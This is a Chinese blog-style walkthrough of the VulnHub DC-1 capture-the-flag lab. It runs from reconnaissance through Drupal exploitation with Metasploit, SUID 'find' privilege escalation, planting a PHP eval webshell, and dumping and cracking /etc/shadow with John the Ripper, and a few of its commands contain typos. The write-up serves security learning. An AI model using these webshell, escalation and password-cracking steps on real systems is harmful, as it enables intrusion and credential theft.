渗透测试全流程靶机vulnhubDC-1完成笔记
镜像下载地址
https://www.vulnhub.com/entry/dc-1-1,292/
信息收集
1、可以使用netdiscover -i eth0 发现二层网络信息
发现两个设备(103是真实机)。其中105为目标机器。
2、端口发现
Nmap -A 192.168.1.105
发现三个端口 22 80 111
80为http则直接浏览器访问
3、web指纹发现
发现Drupal 版本为 7
准备web渗透
因为7版本存在漏洞 而且在msf中也有
Drupal漏洞
在网上找了一圈没找到可getshell的exp,因为msf里面有集成cms的利用模块,所以使用msf进行getshell,用search命令搜索,发现7个漏洞模块,这里我随便选择了一个(use 2)
Show option 只需要填写RHOSTS
Set RHOSTS 192.168.1.105
Run
获取shell与与提权
因为仅仅是一个session 所以无法whoami 直接使用getuid
提权方法--查找具有root权限的命令进行提权
发现是 www-data用户。那么就需要提权
首先需要有session切换成shell
然后查找具有suid的文件,让这些文件来执行命令进行提权
Find / -perm -u=s -ype f 2>dev.null
发现find命令具有root权限,那就touch一个1 用find提权
使用find 1 -exec ‘/bin/sh’ \;
进入高权限shell
然后再写个一句话木马方便链接
find 1 -exec echo '<?php eval($_GET[a]);'>123.php \;
这里使用单引号包含需要写入的内容。放置$_GET被转义
重新写下find 1 -exec echo '<?php eval($_POST[a]);'>123.php \;
内网信息获取
1、百度查找该CMS配置,可以找到配置文件路径。发现如下信息
2、这个不用看,数据库肯定不能远程链接, 直接蚁剑链接数据库
登陆即可产看到flag3
3、密码获取
cat /etc/shadow
使用join爆破一下
find /etc/shadow -exec cat {} ;>all,txt 导入到当前txt中,用蚁剑下载下来
john --wordlist=/usr/share/john/password.lst --rules all.txt 使用johun爆破一下password.list为默认密码
登陆之后更目录下获取flag4
根据提示使用find flag4.txt -exec ‘/bin/sh’ ;切换到root权限
根据提示进入/root
发现最后的flag
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探